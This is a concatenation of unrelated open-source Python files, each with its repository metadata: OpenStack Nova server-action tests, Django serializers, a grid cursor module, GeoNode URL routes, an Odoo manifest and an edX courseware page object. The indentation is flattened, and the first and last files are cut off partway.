def test_confirm_resize_server(self):
body = dict(confirmResize=None)
self.confirm_resize_called = False
def cr_mock(*args):
self.confirm_resize_called = True
self.stubs.Set(compute_api.API, 'confirm_resize', cr_mock)
req = fakes.HTTPRequest.blank(self.url)
body = self.controller._action_confirm_resize(req, FAKE_UUID, body)
self.assertEqual(self.confirm_resize_called, True)
def test_confirm_resize_migration_not_found(self):
body = dict(confirmResize=None)
def confirm_resize_mock(*args):
raise exception.MigrationNotFoundByStatus(instance_id=1,
status='finished')
self.stubs.Set(compute_api.API,
'confirm_resize',
confirm_resize_mock)
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_confirm_resize,
req, FAKE_UUID, body)
def test_confirm_resize_raises_conflict_on_invalid_state(self):
body = dict(confirmResize=None)
def fake_confirm_resize(*args, **kwargs):
raise exception.InstanceInvalidState(attr='fake_attr',
state='fake_state', method='fake_method',
instance_uuid='fake')
self.stubs.Set(compute_api.API, 'confirm_resize',
fake_confirm_resize)
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPConflict,
self.controller._action_confirm_resize,
req, FAKE_UUID, body)
def test_revert_resize_migration_not_found(self):
body = dict(revertResize=None)
def revert_resize_mock(*args):
raise exception.MigrationNotFoundByStatus(instance_id=1,
status='finished')
self.stubs.Set(compute_api.API,
'revert_resize',
revert_resize_mock)
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_revert_resize,
req, FAKE_UUID, body)
def test_revert_resize_server_not_found(self):
body = dict(revertResize=None)
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob. exc.HTTPNotFound,
self.controller._action_revert_resize,
req, "bad_server_id", body)
def test_revert_resize_server(self):
body = dict(revertResize=None)
self.revert_resize_called = False
def revert_mock(*args):
self.revert_resize_called = True
self.stubs.Set(compute_api.API, 'revert_resize', revert_mock)
req = fakes.HTTPRequest.blank(self.url)
body = self.controller._action_revert_resize(req, FAKE_UUID, body)
self.assertEqual(self.revert_resize_called, True)
def test_revert_resize_raises_conflict_on_invalid_state(self):
body = dict(revertResize=None)
def fake_revert_resize(*args, **kwargs):
raise exception.InstanceInvalidState(attr='fake_attr',
state='fake_state', method='fake_method',
instance_uuid='fake')
self.stubs.Set(compute_api.API, 'revert_resize',
fake_revert_resize)
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPConflict,
self.controller._action_revert_resize,
req, FAKE_UUID, body)
def test_create_image(self):
body = {
'createImage': {
'name': 'Snapshot 1',
},
}
req = fakes.HTTPRequest.blank(self.url)
response = self.controller._action_create_image(req, FAKE_UUID, body)
location = response.headers['Location']
self.assertEqual('http://localhost/v2/fake/images/123', location)
def test_create_image_glance_link_prefix(self):
self.flags(osapi_glance_link_prefix='https://glancehost')
body = {
'createImage': {
'name': 'Snapshot 1',
},
}
req = fakes.HTTPRequest.blank(self.url)
response = self.controller._action_create_image(req, FAKE_UUID, body)
location = response.headers['Location']
self.assertEqual('https://glancehost/v2/fake/images/123', location)
def test_create_image_name_too_long(self):
long_name = 'a' * 260
body = {
'createImage': {
'name': long_name,
},
}
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_create_image, req,
FAKE_UUID, body)
def _do_test_create_volume_backed_image(self, extra_properties):
def _fake_id(x):
return '%s-%s-%s-%s' % (x * 8, x * 4, x * 4, x * 12)
body = dict(createImage=dict(name='snapshot_of_volume_backed'))
if extra_properties:
body['createImage']['metadata'] = extra_properties
image_service = glance.get_default_image_service()
bdm = [dict(volume_id=_fake_id('a'),
volume_size=1,
device_name='vda',
delete_on_termination=False)]
props = dict(kernel_id=_fake_id('b'),
ramdisk_id=_fake_id('c'),
root_device_name='/dev/vda',
block_device_mapping=bdm)
original_image = dict(properties=props,
container_format='ami',
status='active',
is_public=True)
image_service.create(None, original_image)
def fake_block_device_mapping_get_all_by_instance(context, inst_id,
use_slave=False):
return [fake_block_device.FakeDbBlockDeviceDict(
{'volume_id': _fake_id('a'),
'source_type': 'snapshot',
'destination_type': 'volume',
'volume_size': 1,
'device_name': 'vda',
'snapshot_id': 1,
'boot_index': 0,
'delete_on_termination': False,
'no_device': None})]
self.stubs.Set(db, 'block_device_mapping_get_all_by_instance',
fake_block_device_mapping_get_all_by_instance)
instance = fakes.fake_instance_get(image_ref=original_image['id'],
vm_state=vm_states.ACTIVE,
root_device_name='/dev/vda')
self.stubs.Set(db, 'instance_get_by_uuid', instance)
volume = dict(id=_fake_id('a'),
size=1,
host='fake',
display_description='fake')
snapshot = dict(id=_fake_id('d'))
self.mox.StubOutWithMock(self.controller.compute_api, 'volume_api')
volume_api = self.controller.compute_api.volume_api
volume_api.get(mox.IgnoreArg(), volume['id']).AndReturn(volume)
volume_api.create_snapshot_force(mox.IgnoreArg(), volume['id'],
mox.IgnoreArg(), mox.IgnoreArg()).AndReturn(snapshot)
self.mox.ReplayAll()
req = fakes.HTTPRequest.blank(self.url)
response = self.controller._action_create_image(req, FAKE_UUID, body)
location = response.headers['Location']
image_id = location.replace('http://localhost/v2/fake/images/', '')
image = image_service.show(None, image_id)
self.assertEqual(image['name'], 'snapshot_of_volume_backed')
properties = image['properties']
self.assertEqual(properties['kernel_id'], _fake_id('b'))
self.assertEqual(properties['ramdisk_id'], _fake_id('c'))
self.assertEqual(properties['root_device_name'], '/dev/vda')
self.assertEqual(properties['bdm_v2'], True)
bdms = properties['block_device_mapping']
self.assertEqual(len(bdms), 1)
self.assertEqual(bdms[0]['boot_index'], 0)
self.assertEqual(bdms[0]['source_type'], 'snapshot')
self.assertEqual(bdms[0]['destination_type'], 'volume')
self.assertEqual(bdms[0]['snapshot_id'], snapshot['id'])
for fld in ('connection_info', 'id',
'instance_uuid', 'device_name'):
self.assertNotIn(fld, bdms[0])
for k in extra_properties.keys():
self.assertEqual(properties[k], extra_properties[k])
def test_create_volume_backed_image_no_metadata(self):
self._do_test_create_volume_backed_image({})
def test_create_volume_backed_image_with_metadata(self):
self._do_test_create_volume_backed_image(dict(ImageType='Gold',
ImageVersion='2.0'))
def _test_create_volume_backed_image_with_metadata_from_volume(
self, extra_metadata=None):
def _fake_id(x):
return '%s-%s-%s-%s' % (x * 8, x * 4, x * 4, x * 12)
body = dict(createImage=dict(name='snapshot_of_volume_backed'))
if extra_metadata:
body['createImage']['metadata'] = extra_metadata
image_service = glance.get_default_image_service()
def fake_block_device_mapping_get_all_by_instance(context, inst_id,
use_slave=False):
return [fake_block_device.FakeDbBlockDeviceDict(
{'volume_id': _fake_id('a'),
'source_type': 'snapshot',
'destination_type': 'volume',
'volume_size': 1,
'device_name': 'vda',
'snapshot_id': 1,
'boot_index': 0,
'delete_on_termination': False,
'no_device': None})]
self.stubs.Set(db, 'block_device_mapping_get_all_by_instance',
fake_block_device_mapping_get_all_by_instance)
instance = fakes.fake_instance_get(image_ref='',
vm_state=vm_states.ACTIVE,
root_device_name='/dev/vda')
self.stubs.Set(db, 'instance_get_by_uuid', instance)
fake_metadata = {'test_key1': 'test_value1',
'test_key2': 'test_value2'}
volume = dict(id=_fake_id('a'),
size=1,
host='fake',
display_description='fake',
volume_image_metadata=fake_metadata)
snapshot = dict(id=_fake_id('d'))
self.mox.StubOutWithMock(self.controller.compute_api, 'volume_api')
volume_api = self.controller.compute_api.volume_api
volume_api.get(mox.IgnoreArg(), volume['id']).AndReturn(volume)
volume_api.get(mox.IgnoreArg(), volume['id']).AndReturn(volume)
volume_api.create_snapshot_force(mox.IgnoreArg(), volume['id'],
mox.IgnoreArg(), mox.IgnoreArg()).AndReturn(snapshot)
req = fakes.HTTPRequest.blank(self.url)
self.mox.ReplayAll()
response = self.controller._action_create_image(req, FAKE_UUID, body)
location = response.headers['Location']
image_id = location.replace('http://localhost/v2/fake/images/', '')
image = image_service.show(None, image_id)
properties = image['properties']
self.assertEqual(properties['test_key1'], 'test_value1')
self.assertEqual(properties['test_key2'], 'test_value2')
if extra_metadata:
for key, val in extra_metadata.items():
self.assertEqual(properties[key], val)
def test_create_vol_backed_img_with_meta_from_vol_without_extra_meta(self):
self._test_create_volume_backed_image_with_metadata_from_volume()
def test_create_vol_backed_img_with_meta_from_vol_with_extra_meta(self):
self._test_create_volume_backed_image_with_metadata_from_volume(
extra_metadata={'a': 'b'})
def test_create_image_snapshots_disabled(self):
"""Don't permit a snapshot if the allow_instance_snapshots flag is
False
"""
self.flags(allow_instance_snapshots=False)
body = {
'createImage': {
'name': 'Snapshot 1',
},
}
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_create_image,
req, FAKE_UUID, body)
def test_create_image_with_metadata(self):
body = {
'createImage': {
'name': 'Snapshot 1',
'metadata': {'key': 'asdf'},
},
}
req = fakes.HTTPRequest.blank(self.url)
response = self.controller._action_create_image(req, FAKE_UUID, body)
location = response.headers['Location']
self.assertEqual('http://localhost/v2/fake/images/123', location)
def test_create_image_with_too_much_metadata(self):
body = {
'createImage': {
'name': 'Snapshot 1',
'metadata': {},
},
}
for num in range(CONF.quota_metadata_items + 1):
body['createImage']['metadata']['foo%i' % num] = "bar"
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPForbidden,
self.controller._action_create_image,
req, FAKE_UUID, body)
def test_create_image_no_name(self):
body = {
'createImage': {},
}
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_create_image,
req, FAKE_UUID, body)
def test_create_image_blank_name(self):
body = {
'createImage': {
'name': '',
}
}
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_create_image,
req, FAKE_UUID, body)
def test_create_image_bad_metadata(self):
body = {
'createImage': {
'name': 'geoff',
'metadata': 'henry',
},
}
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_create_image,
req, FAKE_UUID, body)
def test_create_image_raises_conflict_on_invalid_state(self):
def snapshot(*args, **kwargs):
raise exception.InstanceInvalidState(attr='fake_attr',
state='fake_state', method='fake_method',
instance_uuid='fake')
self.stubs.Set(compute_api.API, 'snapshot', snapshot)
body = {
"createImage": {
"name": "test_snapshot",
},
}
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPConflict,
self.controller._action_create_image,
req, FAKE_UUID, body)
class TestServerActionXMLDeserializer(test.TestCase):
def setUp(self):
super(TestServerActionXMLDeserializer, self).setUp()
self.deserializer = servers.ActionDeserializer()
def test_create_image(self):
serial_request = """
<createImage xmlns="http://docs.openstack.org/compute/api/v1.1"
name="new-server-test"/>"""
request = self.deserializer.deserialize(serial_request, 'action')
expected = {
"createImage": {
"name": "new-server-test",
},
}
self.assertEqual(request['body'], expected)
def test_create_image_with_metadata(self):
serial_request = """
<createImage xmlns="http://docs.openstack.org/compute/api/v1.1"
name="new-server-test">
<metadata>
<meta key="key1">value1</meta>
</metadata>
</createImage>"""
request = self.deserializer.deserialize(serial_request, 'action')
expected = {
"createImage": {
"name": "new-server-test",
"metadata": {"key1": "value1"},
},
}
self.assertEqual(request['body'], expected)
def test_change_pass(self):
serial_request = """<?xml version="1.0" encoding="UTF-8"?>
<changePassword
xmlns="http://docs.openstack.org/compute/api/v1.1"
adminPass="1234pass"/> """
request = self.deserializer.deserialize(serial_request, 'action')
expected = {
"changePassword": {
"adminPass": "1234pass",
},
}
self.assertEqual(request['body'], expected)
def test_change_pass_no_pass(self):
serial_request = """<?xml version="1.0" encoding="UTF-8"?>
<changePassword
xmlns="http://docs.openstack.org/compute/api/v1.1"/> """
self.assertRaises(AttributeError,
self.deserializer.deserialize,
serial_request,
'action')
def test_change_pass_empty_pass(self):
serial_request = """<?xml version="1.0" encoding="UTF-8"?>
<changePassword
xmlns="http://docs.openstack.org/compute/api/v1.1"
adminPass=""/> """
request = self.deserializer.deserialize(serial_request, 'action')
expected = {
"changePassword": {
"adminPass": "",
},
}
self.assertEqual(request['body'], expected)
def test_reboot(self):
serial_request = """<?xml version="1.0" encoding="UTF-8"?>
<reboot
xmlns="http://docs.openstack.org/compute/api/v1.1"
type="HARD"/>"""
request = self.deserializer.deserialize(serial_request, 'action')
expected = {
"reboot": {
"type": "HARD",
},
}
self.assertEqual(request['body'], expected)
def test_reboot_no_type(self):
serial_request = """<?xml version="1.0" encoding="UTF-8"?>
<reboot
xmlns="http://docs.openstack.org/compute/api/v1.1"/>"""
self.assertRaises(AttributeError,
self.deserializer.deserialize,
serial_request,
'action')
def test_resize(self):
serial_request = """<?xml version="1.0" encoding="UTF-8"?>
<resize
xmlns="http://docs.openstack.org/compute/api/v1.1"
flavorRef="http://localhost/flavors/3"/>"""
request = self.deserializer.deserialize(serial_request, 'action')
expected = {
"resize": {"flavorRef": "http://localhost/flavors/3"},
}
self.assertEqual(request['body'], expected)
def test_resize_no_flavor_ref(self):
serial_request = """<?xml version="1.0" encoding="UTF-8"?>
<resize
xmlns="http://docs.openstack.org/compute/api/v1.1"/>"""
self.assertRaises(AttributeError,
self.deserializer.deserialize,
serial_request,
'action')
def test_confirm_resize(self):
serial_request = """<?xml version="1.0" encoding="UTF-8"?>
<confirmResize
xmlns="http://docs.openstack.org/compute/api/v1.1"/>"""
request = self.deserializer.deserialize(serial_request, 'action')
expected = {
"confirmResize": None,
}
self.assertEqual(request['body'], expected)
def test_revert_resize(self):
serial_request = """<?xml version="1.0" encoding="UTF-8"?>
<revertResize
xmlns="http://docs.openstack.org/compute/api/v1.1"/>"""
request = self.deserializer.deserialize(serial_request, 'action')
expected = {
"revertResize": None,
}
self.assertEqual(request['body'], expected)
def test_rebuild(self):
serial_request = """<?xml version="1.0" encoding="UTF-8"?>
<rebuild
xmlns="http://docs.openstack.org/compute/api/v1.1"
name="new-server-test"
imageRef="http://localhost/images/1">
<metadata>
<meta key="My Server Name">Apache1</meta>
</metadata>
<personality>
<file path="/etc/banner.txt">Mg==</file>
</personality>
</rebuild>"""
request = self.deserializer.deserialize(serial_request, 'action')
expected = {
"rebuild": {
"name": "new-server-test",
"imageRef": "http://localhost/images/1",
"metadata": {
"My Server Name": "Apache1",
},
"personality": [
{"path": "/etc/banner.txt", "contents": "Mg=="},
],
},
}
self.assertThat(request['body'], matchers.DictMatches(expected))
def test_rebuild_minimum(self):
serial_request = """<?xml version="1.0" encoding="UTF-8"?>
<rebuild
xmlns="http://docs.openstack.org/compute/api/v1.1"
imageRef="http://localhost/images/1"/>"""
request = self.deserializer.deserialize(serial_request, 'action')
expected = {
"rebuild": {
"imageRef": "http://localhost/images/1",
},
}
self.assertThat(request['body'], matchers.DictMatches(expected))
def test_rebuild_no_imageRef(self):
serial_request = """<?xml version="1.0" encoding="UTF-8"?>
<rebuild
xmlns="http://docs.openstack.org/compute/api/v1.1"
name="new-server-test">
<metadata>
<meta key="My Server Name">Apache1</meta>
</metadata>
<personality>
<file path="/etc/banner.txt">Mg==</file>
</personality>
</rebuild>"""
self.assertRaises(AttributeError,
self.deserializer.deserialize,
serial_request,
'action')
def test_rebuild_blank_name(self):
serial_request = """<?xml version="1.0" encoding="UTF-8"?>
<rebuild
xmlns="http://docs.openstack.org/compute/api/v1.1"
imageRef="http://localhost/images/1"
name=""/>"""
self.assertRaises(AttributeError,
self.deserializer.deserialize,
serial_request,
'action')
def test_rebuild_preserve_ephemeral_passed(self):
serial_request = """<?xml version="1.0" encoding="UTF-8"?>
<rebuild
xmlns="http://docs.openstack.org/compute/api/v1.1"
imageRef="http://localhost/images/1"
preserve_ephemeral="true"/>"""
request = self.deserializer.deserialize(serial_request, 'action')
expected = {
"rebuild": {
"imageRef": "http://localhost/images/1",
"preserve_ephemeral": True,
},
}
self.assertThat(request['body'], matchers.DictMatches(expected))
def test_corrupt_xml(self):
"""Should throw a 400 error on corrupt xml."""
self.assertRaises(
exception.MalformedRequestBody,
self.deserializer.deserialize,
utils.killer_xml_body())
| vmthunder/nova | nova/tests/api/openstack/compute/test_server_actions.py | Python | apache-2.0 | 60,337 | 0.000447 |
from rest_framework import serializers
from models import SurveyDraft
from taggit.models import Tag
class WritableJSONField(serializers.Field):
""" Serializer for JSONField -- required to make field writable"""
""" ALSO REQUIRED because the default JSONField serialization includes the
`u` prefix on strings when running Django 1.8, resulting in invalid JSON
"""
def __init__(self, **kwargs):
self.allow_blank= kwargs.pop('allow_blank', False)
super(WritableJSONField, self).__init__(**kwargs)
def to_internal_value(self, data):
if (not data) and (not self.required):
return None
else:
try:
return json.loads(data)
except Exception as e:
raise serializers.ValidationError(
u'Unable to parse JSON: {}'.format(e))
def to_representation(self, value):
return value
class ListSurveyDraftSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = SurveyDraft
fields = ('id', 'name', 'asset_type', 'summary', 'date_modified', 'description')
summary = WritableJSONField(required=False)
class DetailSurveyDraftSerializer(serializers.HyperlinkedModelSerializer):
tags = serializers.SerializerMethodField('get_tag_names')
summary = WritableJSONField(required=False)
class Meta:
model = SurveyDraft
fields = ('id', 'name', 'body', 'summary', 'date_modified', 'description', 'tags')
def get_tag_names(self, obj):
return obj.tags.names()
class TagSerializer(serializers.HyperlinkedModelSerializer):
count = serializers.SerializerMethodField()
label = serializers.CharField(source='name')
class Meta:
model = Tag
fields = ('id', 'label', 'count')
def get_count(self, obj):
return SurveyDraft.objects.filter(tags__name__in=[obj.name])\
.filter(user=self.context.get('request', None).user)\
.filter(asset_type='question')\
.count()
| onaio/dkobo | dkobo/koboform/serializers.py | Python | agpl-3.0 | 2,038 | 0.002944 |
from .util.deb import deb
from .util.nrange import nrange
from .cell import Cell
#F,e,Cursor
from .grid import spoint
CURSOR_POS=None
def gcp(): #get cursor position
global CURSOR_POS
deb('gcp',CURSOR_POS)
return CURSOR_POS
def scp(x,y):
deb('scp',gcp(),x,y)
cxc=0 #todo, normalize in cursor...
global CURSOR_POS
CURSOR_POS=(x,y)
assert (x,y)==gcp()
#todo cpget and cpset
cpget=gcp
cpset=scp
def cursor(HG,x,y,f,X,Y):
deb('make an a cursor in the empty space around point in cell x,y',x,y)
#x,y=x-1,y-1
assert len(f)==4
#HG=_clearcursor(HG)
i=x
j=y
scp(i,j)
cxl=Cell(f[0],0,0)
cyu=Cell(f[1],0,0)
cxr=Cell(f[2],0,0)
cyd=Cell(f[3],0,0,)
HG=spoint(i-1,j,HG,cxl)
HG=spoint(i,j-1,HG,cyu)
HG=spoint(i+1,j,HG,cxr)
HG=spoint(i,j+1,HG,cyd)
return HG
def grid_cursor(HG,x,y,f,X,Y):
return cursor(HG,x,y,f,X,Y)
def _clearcursor(HG):
cp=gcp()
r1=r2=r3=r4=Cell('.',0,0)
deb('clear a cursor in the empty space around point in cell x,y',cp)
if not cp:return HG
i,j=cp
HG=spoint(i-1,j,HG,r1)
HG=spoint(i,j-1,HG,r2)
HG=spoint(i+1,j,HG,r3)
HG=spoint(i,j+1,HG,r4)
return HG
| e7dal/hexy | hexy/cursor.py | Python | gpl-3.0 | 1,100 | 0.128182 |
# -*- coding: utf-8 -*-
#########################################################################
#
# Copyright (C) 2012 OpenPlans
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#########################################################################
from django.conf.urls.defaults import patterns, url
js_info_dict = {
'packages': ('geonode.maps',),
}
urlpatterns = patterns('geonode.maps.views',
url(r'^$', 'map_list', name='maps_browse'),
url(r'^tag/(?P<slug>[-\w]+?)/$', 'maps_tag', name='maps_browse_tag'),
url(r'^new$', 'new_map', name="new_map"),
url(r'^new/data$', 'new_map_json', name='new_map_json'),
url(r'^(?P<mapid>\d+)$', 'map_detail', name='map_detail'),
url(r'^(?P<mapid>\d+)/view$', 'map_view', name='map_view'),
url(r'^(?P<mapid>\d+)/data$', 'map_json', name='map_json'),
url(r'^(?P<mapid>\d+)/download$', 'map_download', name='map_download'),
url(r'^(?P<mapid>\d+)/wmc$', 'map_wmc', name='map_wmc'),
url(r'^(?P<mapid>\d+)/remove$', 'map_remove', name='map_remove'),
url(r'^(?P<mapid>\d+)/metadata$', 'map_metadata', name='map_metadata'),
url(r'^(?P<mapid>\d+)/embed$', 'map_embed', name='map_embed'),
url(r'^(?P<mapid>\d+)/permissions$', 'map_permissions', name='map_permissions'),
url(r'^(?P<mapid>\d+)/thumbnail$', 'map_thumbnail', name='map_thumbnail'),
url(r'^check/$', 'map_download_check', name='map_download_check'),
url(r'^embed/$', 'map_embed', name='map_embed'),
url(r'^(?P<layername>[^/]*)/attributes', 'maplayer_attributes', name='maplayer_attributes'),
#url(r'^change-poc/(?P<ids>\w+)$', 'change_poc', name='maps_change_poc'),
)
| frippe12573/geonode | geonode/maps/urls.py | Python | gpl-3.0 | 2,230 | 0.001794 |
# Copyright 2019-2020 Camptocamp SA
# Copyright 2015 Mathias Neef copadoMEDIA UG
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
{
"name": "Switzerland Country States",
"category": "Localisation",
"summary": "",
"version": "14.0.1.0.0",
"author": "copado MEDIA UG," "Odoo Community Association (OCA)",
"website": "https://github.com/OCA/l10n-switzerland",
"license": "AGPL-3",
"depends": ["base"],
"data": ["data/res_country_states.xml"],
}
| OCA/l10n-switzerland | l10n_ch_states/__manifest__.py | Python | agpl-3.0 | 493 | 0 |
"""
Courseware page.
"""
from bok_choy.page_object import PageObject, unguarded
from bok_choy.promise import EmptyPromise
import re
from selenium.webdriver.common.action_chains import ActionChains
from common.test.acceptance.pages.lms.bookmarks import BookmarksPage
from common.test.acceptance.pages.lms.course_page import CoursePage
class CoursewarePage(CoursePage):
"""
Course info.
"""
url_path = "courseware/"
xblock_component_selector = '.vert .xblock'
# TODO: TNL-6546: Remove sidebar selectors
section_selector = '.chapter'
subsection_selector = '.chapter-content-container a'
def __init__(self, browser, course_id):
super(CoursewarePage, self).__init__(browser, course_id)
self.nav = CourseNavPage(browser, self)
def is_browser_on_page(self):
return self.q(css='.course-content').present
@property
def chapter_count_in_navigation(self):
"""
Returns count of chapters available on LHS navigation.
"""
return len(self.q(css='nav.course-navigation a.chapter'))
# TODO: TNL-6546: Remove and find callers.
@property
def num_sections(self):
"""
Return the number of sections in the sidebar on the page
"""
return len(self.q(css=self.section_selector))
# TODO: TNL-6546: Remove and find callers.
@property
def num_subsections(self):
"""
Return the number of subsections in the sidebar on the page, including in collapsed sections
"""
return len(self.q(css=self.subsection_selector))
@property
def xblock_components(self):
"""
Return the xblock components within the unit on the page.
"""
return self.q(css=self.xblock_component_selector)
@property
def num_xblock_components(self):
"""
Return the number of rendered xblocks within the unit on the page
"""
return len(self.xblock_components)
def xblock_component_type(self, index=0):
"""
Extract rendered xblock component type.
Returns:
str: xblock module type
index: which xblock to query, where the index is the vertical display within the page
(default is 0)
"""
return self.q(css=self.xblock_component_selector).attrs('data-block-type')[index]
def xblock_component_html_content(self, index=0):
"""
Extract rendered xblock component html content.
Returns:
str: xblock module html content
index: which xblock to query, where the index is the vertical display within the page
(default is 0)
"""
# When Student Notes feature is enabled, it looks for the content inside
# `.edx-notes-wrapper-content` element (Otherwise, you will get an
# additional html related to Student Notes).
element = self.q(css='{} .edx-notes-wrapper-content'.format(self.xblock_component_selector))
if element.first:
return element.attrs('innerHTML')[index].strip()
else:
return self.q(css=self.xblock_component_selector).attrs('innerHTML')[index].strip()
def verify_tooltips_displayed(self):
"""
Verify that all sequence navigation bar tooltips are being displayed upon mouse hover.
If a tooltip does not appear, raise a BrokenPromise.
"""
for index, tab in enumerate(self.q(css='#sequence-list > li')):
ActionChains(self.browser).move_to_element(tab).perform()
self.wait_for_element_visibility(
'#tab_{index} > .sequence-tooltip'.format(index=index),
'Tab {index} should appear'.format(index=index)
)
@property
def course_license(self):
"""
Returns the course license text, if present. Else returns None.
"""
element = self.q(css="#content .container-footer .course-license")
if element.is_present():
return element.text[0]
return None
def go_to_sequential_position(self, sequential_position):
"""
Within a section/subsection navigate to the sequential position specified by `sequential_position`.
Arguments:
sequential_position (int): position in sequential bar
"""
def is_at_new_position():
"""
Returns whether the specified tab has become active. It is defensive
against the case where the page is still being loaded.
"""
active_tab = self._active_sequence_tab
try:
return active_tab and int(active_tab.attrs('data-element')[0]) == sequential_position
except IndexError:
return False
sequential_position_css = '#sequence-list #tab_{0}'.format(sequential_position - 1)
self.q(css=sequential_position_css).first.click()
EmptyPromise(is_at_new_position, "Position navigation fulfilled").fulfill()
@property
def sequential_position(self):
"""
Returns the position of the active tab in the sequence.
"""
tab_id = self._active_sequence_tab.attrs('id')[0]
return int(tab_id.split('_')[1])
@property
def _active_sequence_tab(self): # pylint: disable=missing-docstring
return self.q(css='#sequence-list .nav-item.active')
@property
def is_next_button_enabled(self): # pylint: disable=missing-docstring
return not self.q(css='.sequence-nav > .sequence-nav-button.button-next.disabled').is_present()
@property
def is_previous_button_enabled(self): # pylint: disable=missing-docstring
return not self.q(css='.sequence-nav > .sequence-nav-button.button-previous.disabled').is_present()
def click_next_button_on_top(self): # pylint: disable=missing-docstring
self._click_navigation_button('sequence-nav', 'button-next')
def click_next_button_on_bottom(self): # pylint: disable=missing-docstring
self._click_navigation_button('sequence-bottom', 'button-next')
def click_previous_button_on_top(self): # pylint: disable=missing-docstring
self._click_navigation_button('sequence-nav', 'button-previous')
def click_previous_button_on_bottom(self): # pylint: disable=missing-docstring
self._click_navigation_button('sequence-bottom', 'button-previous')
def _click_navigation_button(self, top_or_bottom_class, next_or_previous_class):
"""
Clicks the navigation button, given the respective CSS classes.
"""
previous_tab_id = self._active_sequence_tab.attrs('data-id')[0]
def is_at_new_tab_id():
"""
Returns whether the active tab has changed. It is defensive
against the case where the page is still being loaded.
"""
active_tab = self._active_sequence_tab
try:
return active_tab and previous_tab_id != active_tab.attrs('data-id')[0]
except IndexError:
return False
self.q(
css='.{} > .sequence-nav-button.{}'.format(top_or_bottom_class, next_or_previous_class)
).first.click()
EmptyPromise(is_at_new_tab_id, "Button navigation fulfilled").fulfill()
@property
def can_start_proctored_exam(self):
"""
Returns True if the timed/proctored exam timer bar is visible on the courseware.
"""
return self.q(css='button.start-timed-exam[data-start-immediately="false"]').is_present()
def start_timed_exam(self):
"""
clicks the start this timed exam link
"""
self.q(css=".xblock-student_view .timed-exam .start-timed-exam").first.click()
self.wait_for_element_presence(".proctored_exam_status .exam-timer", "Timer bar")
def stop_timed_exam(self):
"""
clicks the stop this timed exam link
"""
self.q(css=".proctored_exam_status button.exam-button-turn-in-exam").first.click()
self.wait_for_element_absence(".proctored_exam_status .exam-button-turn-in-exam", "End Exam Button gone")
self.wait_for_element_presence("button[name='submit-proctored-exam']", "Submit Exam Button")
self.q(css="button[name='submit-proctored-exam']").first.click()
self.wait_for_element_absence(".proctored_exam_status .exam-timer", "Timer bar")
def start_proctored_exam(self):
"""
clicks the start this timed exam link
"""
self.q(css='button.start-timed-exam[data-start-immediately="false"]').first.click()
# Wait for the unique exam code to appear.
# self.wait_for_element_presence(".proctored-exam-code", "unique exam code")
def has_submitted_exam_message(self):
"""
Returns whether the "you have submitted your exam" message is present.
This being true implies "the exam contents and results are hidden".
"""
return self.q(css="div.proctored-exam.completed").visible
def content_hidden_past_due_date(self):
"""
Returns whether the "the due date for this ___ has passed" message is present.
___ is the type of the hidden content, and defaults to subsection.
This being true implies "the ___ contents are hidden because their due date has passed".
"""
message = "this assignment is no longer available"
if self.q(css="div.seq_content").is_present():
return False
for html in self.q(css="div.hidden-content").html:
if message in html:
return True
return False
@property
def entrance_exam_message_selector(self):
"""
Return the entrance exam status message selector on the top of courseware page.
"""
return self.q(css='#content .container section.course-content .sequential-status-message')
def has_entrance_exam_message(self):
"""
Returns boolean indicating presence entrance exam status message container div.
"""
return self.entrance_exam_message_selector.is_present()
def has_passed_message(self):
"""
Returns boolean indicating presence of passed message.
"""
return self.entrance_exam_message_selector.is_present() \
and "You have passed the entrance exam" in self.entrance_exam_message_selector.text[0]
def has_banner(self):
"""
Returns boolean indicating presence of banner
"""
return self.q(css='.pattern-library-shim').is_present()
@property
def is_timer_bar_present(self):
"""
Returns True if the timed/proctored exam timer bar is visible on the courseware.
"""
return self.q(css=".proctored_exam_status .exam-timer").is_present()
def active_usage_id(self):
""" Returns the usage id of active sequence item """
get_active = lambda el: 'active' in el.get_attribute('class')
attribute_value = lambda el: el.get_attribute('data-id')
return self.q(css='#sequence-list .nav-item').filter(get_active).map(attribute_value).results[0]
@property
def breadcrumb(self):
""" Return the course tree breadcrumb shown above the sequential bar """
return [part.strip() for part in self.q(css='.path .position').text[0].split('>')]
def unit_title_visible(self):
""" Check if unit title is visible """
return self.q(css='.unit-title').visible
def bookmark_button_visible(self):
""" Check if bookmark button is visible """
EmptyPromise(lambda: self.q(css='.bookmark-button').visible, "Bookmark button visible").fulfill()
return True
@property
def bookmark_button_state(self):
""" Return `bookmarked` if button is in bookmarked state else '' """
return 'bookmarked' if self.q(css='.bookmark-button.bookmarked').present else ''
@property
def bookmark_icon_visible(self):
""" Check if bookmark icon is visible on active sequence nav item """
return self.q(css='.active .bookmark-icon').visible
def click_bookmark_unit_button(self):
""" Bookmark a unit by clicking on Bookmark button """
previous_state = self.bookmark_button_state
self.q(css='.bookmark-button').first.click()
EmptyPromise(lambda: self.bookmark_button_state != previous_state, "Bookmark button toggled").fulfill()
# TODO: TNL-6546: Remove this helper function
def click_bookmarks_button(self):
